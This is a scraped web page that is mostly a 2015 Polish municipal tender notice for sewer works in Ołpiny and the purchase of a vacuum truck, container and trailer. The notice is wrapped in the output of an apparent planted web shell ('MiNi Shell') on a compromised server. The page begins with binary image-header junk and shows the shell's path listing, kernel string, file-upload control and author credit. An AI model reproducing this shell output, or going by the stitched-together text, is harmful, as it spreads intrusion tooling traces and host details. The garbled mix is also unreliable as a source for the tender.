JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150402/46455-N-2015.html

<p class="kh_header"><b>Szerzyny 521: Budowa kanalizacji sanitarnej w miejscowości Ołpiny, zakup wozu asenizacyjnego wraz z kontenerem i przyczepą do transportu osadu z oczyszczalni ścieków</b><br>
<b>Numer ogłoszenia: 46455 - 2015; data zamieszczenia: 02.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Szerzyny , 38-246 Szerzyny 521, woj. małopolskie, tel. 14 651-73-00, faks 14 651-79-01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szerzyny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w miejscowości Ołpiny, zakup wozu asenizacyjnego wraz z kontenerem i przyczepą do transportu osadu z oczyszczalni ścieków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 1) wykonanie kanalizacji sanitarnej we wsi Ołpiny na odcinkach  Ołpiny Nagórze o długości 1846 mb wraz z jedna przepompownią oraz na odcinku Ołpiny Centrum o długości 523 mb. 
Dokładny opis zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych.  2) Dostawa samochodu ciężarowego wraz z urządzeniem hakowym, zabudowy asenizacyjnej z opcją płukania WUKO, szczelnego kontenera przeznaczonego do wywozu ustabilizowanego osadu ściekowego  z oczyszczalni ścieków i przyczepy dwuosiowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 34.14.45.00-3, 45.34.00.00-2, 45.11.12.00-0, 45.22.12.50-9, 45.23.13.00-8, 45.23.24.23-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 30 000.00 zł (słownie: trzydzieści tysięcy 00/100)
Zadanie nr 2 - 14 000.00 zł (słownie: czternaście tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy do zadania nr 1: 
Warunki zmiany postanowień zawartej umowy w zakresie przedmiotu umowy:
wystąpienie   robót  zamiennych   z przyczyn   o charakterze  technologicznym,  jeżeli wprowadzenie robót zamiennych jest konieczne do prawidłowego wykonania umowy oraz nie powoduje rozszerzenia przedmiotu zamówienia w stosunku do przedmiotu określonego w specyfikacji istotnych warunków zamówienia oraz wynikającego z treści oferty, na uzasadniony wniosek Wykonawcy, Zamawiającego lub Projektanta; 
konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót. 

Warunki zmiany postanowień zawartej umowy w zakresie terminu realizacji zamówienia:
wystąpienie robót dodatkowych, jeżeli wykonanie tych robót wpłynie na termin wykonania zamówienia podstawowego;
wystąpienie robót zamiennych z przyczyn o charakterze technologicznym, jeżeli wprowadzenie robót zamiennych jest konieczne do prawidłowego wykonania umowy oraz nie powoduje rozszerzenia przedmiotu zamówienia w stosunku do przedmiotu określonego   w specyfikacji   istotnych   warunków   zamówienia   oraz   wynikającego z treści oferty, jeżeli wykonanie tych robót wpłynie na termin wykonania zamówienia podstawowego, roboty zamienne mogą być wykonane na uzasadniony wniosek Wykonawcy, Zamawiającego lub Projektanta;
wystąpienie warunków atmosferycznych uniemożliwiających realizację przedmiotu zamówienia zgodnie z procesem technologicznym;
wystąpienie   przestojów  spowodowanych   koniecznością   usuwania   nieumyślnych uszkodzeń   istniejących   urządzeń   podziemnych, nieoznaczonych  w  dokumentacji projektowej;
wstrzymanie robót przez uprawnione organy; 
działanie siły wyższej;
konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej  lub specyfikacji technicznej wykonania i odbioru robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szerzyny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2015 godzina 09:00, miejsce: w siedzibie Zamawiającego pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa kanalizacji sanitarnej w miejscowości Ołpiny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kanalizacji sanitarnej we wsi Ołpiny na odcinkach: 
1)	Ołpiny Nagórze tylko zakres przedstawiony na rysunku nr 4 projektu o długości 1846 mb wraz z jedna przepompownią,
2)	Ołpiny Centrum o długości 523 mb. 
Dokładny opis zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.12.00-0, 45.23.13.00-8, 45.23.24.23-3, 45.34.00.00-2, 45.22.12.50-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa samochodu asenizacyjnego wraz z kontenerem i przyczepą do transportu osadu z oczyszczalni ścieków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa: samochodu ciężarowego wraz z urządzeniem hakowym o ładowności 8-10 ton, zabudowy asenizacyjnej o poj. 6000 litrów z opcją płukania WUKO o wymiarach  dostosowanych do podwozia samochodu,  szczelnego kontenera przeznaczonego do wywozu ustabilizowanego osadu ściekowego  z oczyszczalni ścieków o wymiarach  dostosowanych do podwozia samochodu,  przyczepy dwuosiowej o ładowności 6000 kg  z trójstronnym systemem wywrotu.  

Podwozie samochodu
Pojazd musi posiadać wszelkie homologacje i atesty wymagane przepisami prawa polskiego i UE, spełniać wymogi przepisów o ruchu drogowym i BHP, być dopuszczony do poruszania się po drogach publicznych, spełniać wymagania dla pojazdów asenizacyjnych. 

Parametry techniczne: 
1.	samochód ciężarowy, rok produkcji 2015 o podwoziu z silnikiem wysokoprężnym o poj. silnika nie większej jak 6000 cm3 spełniającego normy emisji spalin EURO 6 o mocy 250-290 KM, 
2.	napęd 4 x 4,
3.	filtr paliwa podgrzewany, 
4.	hamulec silnikowy, 
5.	płomieniowe urządzenie rozruchowe, 
6.	skrzynia biegów  min 8  biegowa, manualna, 
7.	zasysanie powietrza u góry z suchym filtrem powietrza, 
8.	koła szosowo - terenowe, 
9.	blokada kierownicy z immobiliserem, 
10.	belka zabezpieczająca przed wjazdem z tyłu, 
11.	zbiornik paliwa min. 150 l, 
12.	ABS układ zapobiegający blokowaniu kół podczas hamowania, 
13.	hamulce bębnowe przód i tył, 
14.	elektryczne podnośniki szyb drzwi kierowcy i pasażera, 
15.	lusterka wsteczne podgrzewane i elektrycznie sterowane, lusterka szerokokątne podgrzewane, lusterko krawężnikowe prawe, 
16.	fabryczna aktywacja tachografu - wstępna kalibracja, 
17.	język polski dla wyświetlacza na tablicy wskaźników, 
18.	system dźwiękowy załączonego biegu wstecznego, 
19.	komfortowe siedzenie kierowcy z zawieszeniem pneumatycznym, 
20.	mechaniczny wyłącznik główny akumulatorów,  
21.	immobiliser oraz centralny zamek sterowany z pilota, 
22.	światła do jazdy dziennej oraz światła przeciwmgłowe przednie (światła przednie zabezpieczone siatką), 
23.	2 akumulatory 12V min 155Ah, gniazdo 12V w kabinie, 
24.	Kabina dwudrzwiowa, kolor kabiny biały, jednomodułowa, zapewniająca dostęp do silnika, 3 osobowa wyposażona w układ klimatyzacji manualnej ogrzewanie postojowe umożliwiające ogrzewanie kabiny przy wyłączonym silniku, o uciągu odpowiednim do wagi pojazdu jako urządzenie wspomagające, długość liny 25 mb, wyposażona w hamulec automatyczny, rolkową prowadnicę liny, pokrowiec,
25.	tachograf dla 2 kierowców,  
26.	okna w tylnej ścianie kabiny, 
27.	lampa sygnalizacyjna żółta luzem,
28.	gniazdo 12 V, 
29.	kamera tylna automatycznie załączana przy wstecznym biegu,
30.	2 kliny pod koła, 
31.	zestaw narzędzi naprawczych, 
32.	klucz do kół, 
33.	podnośnik hydrauliczny, 
34.	trójkąt ostrzegawczy, 
35.	apteczka, 
36.	gaśnica, 
37.	3 kamizelki ostrzegawcze, 
38.	instrukcja obsługi w języku polskim. 

Urządzenie hakowe
Zamontowane, fabrycznie nowe urządzenie hakowe zapewniające szybką i bezpieczną wymianę zabudowy asenizacyjnej na kontener do wywozu ustabilizowanego osadu z oczyszczalni
Parametry techniczne:
1.	moc załadunkowa 8 do 10 ton przystosowane do zdejmowania zabudowy asenizacyjnej - kontenerowe, 
2.	teleskopowe ramię główne z dwoma siłownikami,
3.	długość teleskopowania - min.900 mm,
4.	wysokość haka min. - 1200 mm,
5.	ciśnienie robocze min. - 21-25 Mpa,
6.	zbiornik oleju - min. 60 l,
7.	szerokie rolki zapewniające stabilność prowadzenia kontenera,
8.	rama zabudowy hakowej wykonana z wysokogatunkowej stali przygotowana do montażu modułowego przykręcenie na śruby do podwozia,
9.	sterowanie z wewnątrz i z zewnątrz pojazdu (awaryjne),
10.	blokada hydrauliczna kontenera siłownikiem wewnątrz blokady,
11.	łożyskowanie wysuwu haka urządzenia na tarnamidzie, co zapewnia  trwałość i bezobsługowość (nie wymaga smarowania),
12.	uszczelnienia siłowników renomowanej firmy,
13.	podesty robocze po obu stronach podwozia
14.	światła obrysowe
15.	dokumentacja do rejestracji w UDT
16.	wszystkie elementy mocujące urządzenie do podwozia cynkowane ogniowo
17.	urządzenie malowane farbą podkładową epoksydową a następnie  pomalowane nawierzchniowo farbą poliuretanową. 

Zabudowa asenizacyjna z opcją czyszczenia przykanalików:
Nadwozie asenizacyjne o pojemności 6 000 litrów (1 000 litrów na wodę oraz 5 000 litrów na nieczystości ciekłe) z opcją płukania przykanalików (WUKO) min. 50 m dł. węża z głowica frezującą przeznaczoną do  czyszczenia sieci kanalizacji o przekroju do 160 mm.
Parametry techniczne: 
1.	zbiornik wykonany z blachy o grubości min. 5 mm, ożebrowany  wewnętrznie z 				falochronami, pochylony ku tyłowi pod kątem,
2.	zbiornik posadowiony elastycznie na ramie pośredniej mocowanej do ramy samochodu,
3.	kompresor z silnikiem hydraulicznym napędzany pompą hydrauliczną zamontowaną w 	podwoziu poprzez szybkozłącza, wydajność kompresora min. 6 000 l/min, 
4.	czas napełniania zbiornika osadu nie większy niż 6 minut, 
5.	podwójny system zaworów zabezpieczający kompresor przed zalaniem, 
6.	zawór klapowy zabezpieczający kompresor przed zalaniem w czasie jazdy, 
7.	zawór regulacyjny na kompresorze służący do utrzymania nadciśnienia w zbiorniku osadu, 
8.	ciśnienie robocze  0,05 Mpa, podciśnienie max -0,08 Mpa
9.	wyposażenie: manuowakuometr, zawór bezpieczeństwa, płynowskaz, zawór spustowy mechaniczny 4 calowy, wąż ssawny o długości min. 6 m, boczne koryta na węże, 
10.	dennica tylna otwierana mechanicznie, 
11.	głębokość zasysania - min. 6 m od poziomu podłoża, 
12.	opróżnianie zbiornika - hydrostatyczne oraz pod ciśnieniem,
13.	zawór spustowy sterowany ręcznie 4 calowy, 
14.	płynowskazy zbiornika osadu oraz czystej wody, 
15.	koryta boczne na węże ssawne, 
16.	oświetlenie ostrzegawcze, 
17.	układ ciśnieniowy do mycia i płukania przykanalików i studzienek wyposażony w: silnik hydrauliczny z pompą wodną o wydajności min. 66 litrów/min. i ciśnieniu min. 13 MPa, wąż ciśnieniowy ? 12 -13 mm o dł. min 50 m na zwijarce z napędem hydraulicznym, pistolet wodny, 2 dysze kanałowe w tym dysza frezująca, 	zbiornik powietrza z zaworem przedmuchiwania powietrzem, lanca

Kontener do wywozu ustabilizowanego osadu ściekowego
Parametry techniczne: 
1.	dopuszczalna masa całkowita do 10 ton,
2.	kontener posadowiony na konstrukcji ramowej umożliwiającej wciąganie  na samochód 	urządzeniem hakowym o wysokości  haka 1200 mm.,
3.	ładowność 8000 kg, elementy konstrukcji  gwarantujące odpowiednią sztywność, 
4.	elementy konstrukcyjne kontenera posiadające zabezpieczenie antykorozyjne z malowaniem farbą nawierzchniową, 
5.	grubość blachy podłogi: min 4 mm, 
6.	wymiary kontenera dostosowane do podwozia samochodu,
7.	burty boczne składane, otwierane, 
8.	zwijadło rurowe z plandeką sznurowaną, 


Przyczepa

Dostawa  fabrycznie  nowej uszczelnionej przyczepy 2-osiowej do wywożenia osadu z oczyszczalni oraz innych odpadów komunalnych.  Pojazd musi spełniać m.in. wymogi przepisów o ruchu drogowym i być dopuszczony do poruszania się po drogach publicznych.
Parametry techniczne: 
1.	ładowność 6 000 kg; 
2.	grubość blachy podłogi: min 4 mm; 
3.	zawieszenie: resory paraboliczne; 
4.	system wywrotu: trójstronny; kąt wywrotu skrzyni ładunkowej (do tyłu  42 stopnie, na boki 46  stopni); 
5.	burty boczne składane; 
6.	plandeka sznurowana; 
7.	hamulec pneumatyczny; 
8.	koła  z ogumieniem  14.0-65-16.

Powyższy opis należy rozumieć jako określenie minimalnych oczekiwań jakościowych i technicznych  Zamawiającego w stosunku do przedmiotu zamówienia, a nie jako ostateczne rozwiązanie. Zamawiający dopuszcza zgodnie z art. 29 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( Dz. U. z 2013 r. poz. 907 ze zmianami) zastosowanie rozwiązań technicznych równoważnych o cechach nie gorszych niż wyszczególnione w opisie przedmiotu zamówienia. Oznacza to, że Wykonawca może zastosować  do realizacji zamówienia  urządzenia różnych producentów, ale o cechach równoważnych lub nie gorszych niż określone przez Zamawiającego w SIWZ.

Gwarancja i serwis pogwarancyjny: na przedmiot zamówienia Wykonawca udziela gwarancji minimum 36 miesiące, wykonawca powinien posiadać na terenie Polski własny serwis gwarancyjny i pogwarancyjny dla zabudów i podwozia zlokalizowany w odległości do 150 km od siedziby zamawiającego. Wykonawca zobowiązany będzie do usunięcia wszelkich usterek powstałych lub ujawnionych w okresie gwarancyjnym w przeciągu do 7 dni roboczych od daty pisemnego zgłoszenia. Wykonawca gwarantuje bezpłatne przeglądy gwarancyjne pojazdu ( nie dotyczy materiałów eksploatacyjnych).
Dostawa i przeszkolenie kierowcy: Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego Wykonawca zobowiązuje się do przeszkolenia kierowcy oraz służb konserwacyjno- naprawczych zamawiającego w zakresie bezpiecznej obsługi i eksploatacji pojazdu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com